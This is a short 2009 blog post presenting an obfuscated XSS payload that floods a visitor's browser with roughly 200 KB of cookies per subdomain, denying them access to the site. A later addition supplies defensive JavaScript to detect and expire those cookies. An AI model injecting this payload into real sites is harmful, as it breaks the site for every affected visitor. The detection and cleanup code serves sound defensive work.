Sunday, May 10, 2009

XSS based Client-side DoS

Sets about 200 KB of cookies on the client for each subdomain level of the site.
http://pastebin.com/f3dfe04f7

/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>

I pasted the code in case it gets lost on Pastebin.
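
A defensive counterpart, added here and not part of the original post: the payload above writes cookies named 0 to 49, each filled with about 4 KB of commas, with path=/ on every parent domain it can reach, so the same names and attributes can be used to spot and expire them. The function names and the 1000-character threshold are assumptions of this example.

```javascript
// Added example (not from the original post); all names here are hypothetical.
const COOKIE_COUNT = 50; // the payload uses cookie names "0".."49"

// Every parent-domain suffix of a hostname that has at least two labels.
// Browsers ignore cookie writes for public suffixes, so over-listing is harmless.
function domainSuffixes(hostname) {
  const labels = hostname.split(".").filter(Boolean);
  const out = [];
  for (let i = 0; i + 2 <= labels.length; i++) out.push(labels.slice(i).join("."));
  return out;
}

// Cookie strings that expire the padding cookies. They reuse the payload's
// name, path and domain attributes so the browser matches and deletes them.
function cleanupCookieStrings(hostname) {
  const out = [];
  for (const d of domainSuffixes(hostname)) {
    for (let i = 0; i < COOKIE_COUNT; i++) {
      out.push(i + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT;path=/;domain=." + d);
    }
  }
  return out;
}

// Names of cookies in a Cookie header (or document.cookie) that fit the
// payload's pattern: name 0..49 and a long value made only of commas.
function findPaddingCookies(cookieHeader, minLen = 1000) {
  return cookieHeader.split(/;\s*/)
    .map(p => {
      const eq = p.indexOf("=");
      return eq < 0 ? null : [p.slice(0, eq), p.slice(eq + 1)];
    })
    .filter(kv => kv && /^([0-9]|[1-4][0-9])$/.test(kv[0]) &&
                  kv[1].length >= minLen && /^,+$/.test(kv[1]))
    .map(kv => kv[0]);
}

// In a browser (for example from the devtools console on the affected site):
if (typeof document !== "undefined" && findPaddingCookies(document.cookie).length > 0) {
  cleanupCookieStrings(location.hostname).forEach(c => { document.cookie = c; });
}
```

findPaddingCookies can also be run server-side over a logged Cookie header to flag affected clients.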
